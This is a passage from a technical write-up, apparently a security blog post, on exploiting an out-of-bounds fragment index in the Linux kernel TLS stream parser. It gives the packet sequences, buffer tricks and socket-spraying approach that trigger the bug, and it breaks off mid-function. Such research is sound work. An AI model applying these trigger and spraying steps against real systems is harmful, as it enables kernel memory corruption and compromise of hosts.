        <span class="n">tcp_add_receive_queue</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
        <span class="n">skb_set_owner_r</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">sk</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">eaten</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>A flow diagram makes the sequence update clearer.</p>

<p><img src="/assets/image-20251003135826244.png" alt="image-20251003135826244" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="24-combine-all-together">2.4. Combine All Together</h2>

<p>After establishing the connection, we set the receive buffer of the server-side socket to the minimum size.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">rcvbuf_size</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
<span class="n">setsockopt</span><span class="p">(</span><span class="n">accept_fd</span><span class="p">,</span> <span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">SO_RCVBUF</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">rcvbuf_size</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rcvbuf_size</span><span class="p">));</span>
</code></pre></div></div>
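
<p>A request of zero is not applied literally: Linux raises <code class="language-plaintext highlighter-rouge">SO_RCVBUF</code> to an internal minimum. The sketch below reads the value back with <code class="language-plaintext highlighter-rouge">getsockopt()</code> to see what was actually applied; <code class="language-plaintext highlighter-rouge">effective_min_rcvbuf()</code> is a hypothetical helper name, and the exact number it returns depends on the kernel.</p>

```c
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Hypothetical helper: request SO_RCVBUF = 0 on a fresh TCP socket and
 * return the size the kernel actually applied, or -1 on any error.
 */
static int effective_min_rcvbuf(void)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    int req = 0;
    int got = -1;
    socklen_t len = sizeof(got);

    if (fd < 0)
        return -1;

    if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &req, sizeof(req)) < 0 ||
        getsockopt(fd, SOL_SOCKET, SO_RCVBUF, &got, &len) < 0)
        got = -1;

    close(fd);
    return got;
}
```

<p>Printing the returned value on the target machine shows how small the receive buffer really becomes, which helps when choosing the size of the large packet that has to overflow it.</p>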

<p>On the client side, we send the following packets:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>       <span class="c1">// copied_seq=0, urg_seq=0, rcv_nxt=1</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MSG_OOB</span><span class="p">);</span> <span class="c1">// copied_seq=0, urg_seq=1, rcv_nxt=2</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="mh">0x2000</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>  <span class="c1">// copied_seq=0, urg_seq=1, rcv_nxt=0x2002</span>
</code></pre></div></div>

<p>When the last packet is sent, <code class="language-plaintext highlighter-rouge">tcp_inq()</code> returns 1 [1] (<code class="language-plaintext highlighter-rouge">urg_seq</code> - <code class="language-plaintext highlighter-rouge">copied_seq</code>), and <code class="language-plaintext highlighter-rouge">tls_strp_load_anchor_with_queue()</code> sets the anchor’s <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> to <code class="language-plaintext highlighter-rouge">inq</code> [2]. Since <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> (1) is smaller than the prepend size (13), <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> returns zero [3], so <code class="language-plaintext highlighter-rouge">strp-&gt;stm.full_len</code> stays zero and <code class="language-plaintext highlighter-rouge">tls_strp_read_copy()</code> is called [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_sock</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">sz</span><span class="p">,</span> <span class="n">inq</span><span class="p">;</span>

    <span class="n">inq</span> <span class="o">=</span> <span class="n">tcp_inq</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">inq</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">tls_strp_load_anchor_with_queue</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">inq</span><span class="p">);</span> <span class="c1">// [2]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">);</span> <span class="c1">// [3]</span>
        <span class="c1">// [...]</span>

        <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">=</span> <span class="n">sz</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">||</span> <span class="n">inq</span> <span class="o">&lt;</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">tls_strp_read_copy</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
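
<p>The early exit in <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> boils down to one comparison. The sketch below models only that check; <code class="language-plaintext highlighter-rouge">model_header_available()</code> is a hypothetical name, and the value 13 for the prepend size is taken from the annotation in the excerpt shown earlier.</p>

```c
#include <stddef.h>

/*
 * Hypothetical model of the early-exit check in tls_rx_msg_size():
 * returns 0 while the record header is still incomplete, 1 otherwise.
 */
static int model_header_available(size_t offset, size_t prepend_size,
                                  size_t skb_len)
{
    if (offset + prepend_size > skb_len)
        return 0; /* not enough bytes yet, record size stays unknown */
    return 1;
}
```

<p>With an anchor length of 1 and a prepend size of 13, the model reports that the header is not available, which matches the zero return that leaves <code class="language-plaintext highlighter-rouge">full_len</code> unset.</p>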

<p>Because we send a packet larger than the receive buffer, <code class="language-plaintext highlighter-rouge">tcp_epollin_ready()</code> returns true [5], and <strong>copy mode is enabled</strong> [6].</p>

<p>Afterwards, <code class="language-plaintext highlighter-rouge">tls_strp_read_copyin()</code> is used to receive the data.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">qshort</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">tcp_epollin_ready</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">INT_MAX</span><span class="p">)))</span> <span class="c1">// [5]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">copy_mode</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [6]</span>
    <span class="c1">// [...]</span>
    <span class="n">tls_strp_read_copyin</span><span class="p">(</span><span class="n">strp</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Internally, the TCP receive queue is iterated, and each retrieved packet along with its size is passed to <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> as the <code class="language-plaintext highlighter-rouge">in_skb</code> and <code class="language-plaintext highlighter-rouge">in_len</code> parameters.</p>

<p>In this function, the <code class="language-plaintext highlighter-rouge">in_skb</code> packet data is copied into the corresponding fragment (<code class="language-plaintext highlighter-rouge">-&gt;frags[]</code>) of the anchor packet. Since fragments store packet data in page units, <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> first calculates the fragment index <strong>using <code class="language-plaintext highlighter-rouge">skb-&gt;len / PAGE_SIZE</code></strong> [7].</p>

<p>If the record size (<code class="language-plaintext highlighter-rouge">strp-&gt;stm.full_len</code>) is still not determined [8], the packet is reparsed. The data is first copied into the buffer [9], <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> is updated, and then the record header is parsed [10].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">frag</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frags</span><span class="p">[</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">/</span> <span class="n">PAGE_SIZE</span><span class="p">];</span> <span class="c1">// [7]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [8]</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">));</span>
        <span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">in_skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">skb_frag_address</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">+</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">),</span> <span class="n">chunk</span><span class="p">));</span> <span class="c1">// [9] </span>

        <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">chunk</span><span class="p">;</span>
        <span class="n">skb</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">chunk</span><span class="p">;</span>
        <span class="n">skb_frag_size_add</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">chunk</span><span class="p">);</span>

        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span> <span class="c1">// [10]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, due to this vulnerability, <strong>a malformed header may cause the packet not to be consumed (eaten)</strong>. As a result, <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> continues to grow, leading to an <strong>out-of-bounds index</strong> when accessing <code class="language-plaintext highlighter-rouge">frags[]</code>.</p>

<h2 id="25-access-uninitialized-fragment">2.5. Access Uninitialized Fragment</h2>

<p>After copy mode is enabled, we restore the receive buffer size of the accepted socket on the server side:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">rcvbuf_size</span> <span class="o">=</span> <span class="mh">0x20000</span><span class="p">;</span>
<span class="n">setsockopt</span><span class="p">(</span><span class="n">accept_fd</span><span class="p">,</span> <span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">SO_RCVBUF</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">rcvbuf_size</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">rcvbuf_size</span><span class="p">));</span>
</code></pre></div></div>

<p>On the receiving socket, the first call to <code class="language-plaintext highlighter-rouge">__tcp_read_sock()</code> reads up to the urgent byte and advances <code class="language-plaintext highlighter-rouge">copied_seq</code> to match <code class="language-plaintext highlighter-rouge">urg_seq</code>. From then on, <code class="language-plaintext highlighter-rouge">tcp_inq()</code> returns zero (<code class="language-plaintext highlighter-rouge">urg_seq - copied_seq</code>), which prevents further progress.</p>

<p>To bypass this, we first <strong>send a <code class="language-plaintext highlighter-rouge">MSG_OOB</code> packet to update <code class="language-plaintext highlighter-rouge">urg_seq</code></strong>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MSG_OOB</span><span class="p">);</span>
</code></pre></div></div>

<p>Afterwards, we can <strong>trigger <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> by sending additional packets</strong>. Each packet increases <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> by <code class="language-plaintext highlighter-rouge">0x1000</code>.</p>

<p>According to <code class="language-plaintext highlighter-rouge">tls_strp_read_copy()</code>, five pages [1] are allocated and populated into the fragment array of the anchor <code class="language-plaintext highlighter-rouge">skb</code> [2]:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_read_copy</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="n">bool</span> <span class="n">qshort</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">need_spc</span> <span class="o">=</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span> <span class="o">?:</span> <span class="n">TLS_MAX_PAYLOAD_SIZE</span> <span class="cm">/* 0x4000 */</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="cm">/* 0x1000 */</span><span class="p">;</span> <span class="c1">// [1]</span>
    
    <span class="c1">// [...]</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">len</span> <span class="o">=</span> <span class="n">need_spc</span><span class="p">;</span> <span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span> <span class="n">len</span> <span class="o">-=</span> <span class="n">PAGE_SIZE</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">page</span> <span class="o">=</span> <span class="n">alloc_page</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_allocation</span><span class="p">);</span>
        <span class="c1">// [...]</span>
        <span class="n">skb_fill_page_desc</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span><span class="p">,</span> <span class="n">shinfo</span><span class="o">-&gt;</span><span class="n">nr_frags</span><span class="o">++</span><span class="p">,</span> <span class="c1">// [2]</span>
                   <span class="n">page</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So, after sending four packets (excluding the initial OOB), <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> becomes 4 x <code class="language-plaintext highlighter-rouge">0x1000</code> = <code class="language-plaintext highlighter-rouge">0x4000</code>. The initial OOB also increases <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> by <code class="language-plaintext highlighter-rouge">0x1000</code>, so <strong>the total is <code class="language-plaintext highlighter-rouge">0x5000</code></strong>. At this point <code class="language-plaintext highlighter-rouge">skb-&gt;len / PAGE_SIZE == 5</code>, which exceeds the initialized fragment array and causes an out-of-bounds access. The out-of-bounds access in <code class="language-plaintext highlighter-rouge">frags[]</code> will be triggered when <strong>the fifth packet</strong> is sent.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">4</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">send</span><span class="p">(</span><span class="n">client_fd</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</code></pre></div></div>
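<p>The index arithmetic above can be checked with a small userspace model. This is only a sketch: the helper names are made up for illustration, and it assumes, as described above, that every packet (including the initial OOB one) advances <code class="language-plaintext highlighter-rouge">skb-&gt;len</code> by exactly <code class="language-plaintext highlighter-rouge">0x1000</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

#define PAGE_SIZE            0x1000u
#define TLS_MAX_PAYLOAD_SIZE 0x4000u

/* Number of frags[] slots filled by tls_strp_read_copy() when full_len is 0. */
static size_t initialized_frags(void)
{
    return (TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE) / PAGE_SIZE;
}

/* frags[] index used by the next copy after `packets` page-sized increments. */
static size_t next_frag_index(size_t packets)
{
    size_t skb_len = packets * PAGE_SIZE;

    return skb_len / PAGE_SIZE;
}

/* Returns 1 if the next copy lands outside the initialized slots. */
static int next_copy_is_oob(size_t packets)
{
    return next_frag_index(packets) &gt;= initialized_frags();
}
</code></pre></div></div>

<p>With one OOB packet plus three normal packets, the next copy still targets the last initialized slot (index 4). After the fourth normal packet the index becomes 5, one past the five initialized slots.</p>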

<h2 id="3-exploit">3. Exploit</h2>

<h3 id="31-spraying-tcp-socket">3.1. Spraying TCP Socket</h3>

<p>The anchor packet is allocated in <code class="language-plaintext highlighter-rouge">tls_strp_init()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_strp_init</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">sk</span><span class="p">;</span>
    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">anchor</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Internally, <code class="language-plaintext highlighter-rouge">alloc_skb()</code> calls <code class="language-plaintext highlighter-rouge">kmalloc_reserve()</code> to allocate the data buffer. In this case, the buffer is allocated from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">alloc_skb</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span>
                    <span class="n">gfp_t</span> <span class="n">priority</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">__alloc_skb</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">priority</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">NUMA_NO_NODE</span><span class="p">);</span> <span class="c1">// &lt;--------------------</span>
<span class="p">}</span>

<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">__alloc_skb</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp_mask</span><span class="p">,</span>
                <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">int</span> <span class="n">node</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">skb</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_node</span><span class="p">(</span><span class="n">cache</span><span class="p">,</span> <span class="n">gfp_mask</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">GFP_DMA</span><span class="p">,</span> <span class="n">node</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">kmalloc_reserve</span><span class="p">(</span><span class="o">&amp;</span><span class="n">size</span><span class="p">,</span> <span class="n">gfp_mask</span><span class="p">,</span> <span class="n">node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pfmemalloc</span><span class="p">);</span> <span class="c1">// &lt;--------------------</span>
    <span class="c1">// [...]</span>
    <span class="n">__build_skb_around</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc_reserve</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="o">*</span><span class="n">size</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">int</span> <span class="n">node</span><span class="p">,</span>
                 <span class="n">bool</span> <span class="o">*</span><span class="n">pfmemalloc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">obj_size</span> <span class="o">=</span> <span class="n">SKB_HEAD_ALIGN</span><span class="p">(</span><span class="o">*</span><span class="n">size</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">obj_size</span> <span class="o">&lt;=</span> <span class="n">SKB_SMALL_HEAD_CACHE_SIZE</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KMALLOC_NOT_NORMAL_BITS</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">obj</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_node</span><span class="p">(</span><span class="n">net_hotdata</span><span class="p">.</span><span class="n">skb_small_head_cache</span><span class="p">,</span> <span class="n">flags</span> <span class="o">|</span> <span class="n">__GFP_NOMEMALLOC</span> <span class="o">|</span> <span class="n">__GFP_NOWARN</span><span class="p">,</span> <span class="n">node</span><span class="p">);</span> <span class="c1">// [1]</span>
        <span class="o">*</span><span class="n">size</span> <span class="o">=</span> <span class="n">SKB_SMALL_HEAD_CACHE_SIZE</span><span class="p">;</span>
        <span class="c1">// [...]</span>
        <span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">obj_size</span> <span class="o">=</span> <span class="n">kmalloc_size_roundup</span><span class="p">(</span><span class="n">obj_size</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

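<p>After the data buffer is allocated, <code class="language-plaintext highlighter-rouge">__build_skb_around()</code> calls <code class="language-plaintext highlighter-rouge">__finalize_skb_around()</code> to initialize it. The <code class="language-plaintext highlighter-rouge">memset()</code> there only clears the fields that precede <code class="language-plaintext highlighter-rouge">dataref</code>, and <code class="language-plaintext highlighter-rouge">frags[]</code> comes after <code class="language-plaintext highlighter-rouge">dataref</code> in <code class="language-plaintext highlighter-rouge">struct skb_shared_info</code>. Fortunately, this means <strong>the <code class="language-plaintext highlighter-rouge">frags[]</code> array remains uninitialized</strong>, which allows us to populate it by spraying.</p>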

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// called by __build_skb_around()</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">__finalize_skb_around</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span>
                     <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">skb</span><span class="o">-&gt;</span><span class="n">head</span> <span class="o">=</span> <span class="n">data</span><span class="p">;</span>
    <span class="n">skb</span><span class="o">-&gt;</span><span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">shinfo</span> <span class="o">=</span> <span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">shinfo</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">offsetof</span><span class="p">(</span><span class="k">struct</span> <span class="n">skb_shared_info</span><span class="p">,</span> <span class="n">dataref</span><span class="p">));</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
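<p>The effect of the partial <code class="language-plaintext highlighter-rouge">memset()</code> can be reproduced in userspace. The struct below is a simplified stand-in with made-up field sizes, not the real layout of <code class="language-plaintext highlighter-rouge">struct skb_shared_info</code>; it only shows that everything from <code class="language-plaintext highlighter-rouge">dataref</code> onward keeps whatever the previous owner of the memory left there.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

/* Simplified stand-ins; names and sizes are illustrative only. */
struct mock_frag {
    void *page;
    unsigned int len;
    unsigned int offset;
};

struct mock_shared_info {
    unsigned char nr_frags;     /* cleared by the partial memset */
    unsigned short gso_size;    /* cleared by the partial memset */
    int dataref;                /* first field that is NOT cleared */
    struct mock_frag frags[17]; /* keeps stale allocator contents */
};

/* Mirrors the memset() shown above: only the prefix before dataref is zeroed. */
static void mock_finalize(struct mock_shared_info *shinfo)
{
    memset(shinfo, 0, offsetof(struct mock_shared_info, dataref));
    shinfo-&gt;dataref = 1; /* set explicitly, separately from the memset */
}
</code></pre></div></div>

<p>If the buffer is pre-filled with a marker byte before <code class="language-plaintext highlighter-rouge">mock_finalize()</code> runs, <code class="language-plaintext highlighter-rouge">nr_frags</code> reads back as zero while every <code class="language-plaintext highlighter-rouge">frags[]</code> entry still holds the marker.</p>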

<p>Therefore, we need to find a function call to <code class="language-plaintext highlighter-rouge">alloc_skb()</code> that <strong>allocates the data buffer from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code></strong> and <strong>allows us to populate the fragment array</strong>.</p>

<p>At first, I tried spraying with Unix domain stream sockets, but their data buffers are allocated from <code class="language-plaintext highlighter-rouge">kmalloc-512-cg</code>.</p>

<p>Next, I tried <strong>normal TCP sockets</strong>, and luckily, their buffers are allocated from <code class="language-plaintext highlighter-rouge">skb_small_head_cache</code> [2]. Perfect!</p>

<p>Additionally, if the packet data is passed through <strong>the <code class="language-plaintext highlighter-rouge">SYS_splice</code> system call</strong>, the message flag <code class="language-plaintext highlighter-rouge">MSG_SPLICE_PAGES</code> will be set [3], and the pages will be placed into the fragment array [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tcp_sendmsg_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">msghdr</span> <span class="o">*</span><span class="n">msg</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_flags</span> <span class="o">&amp;</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
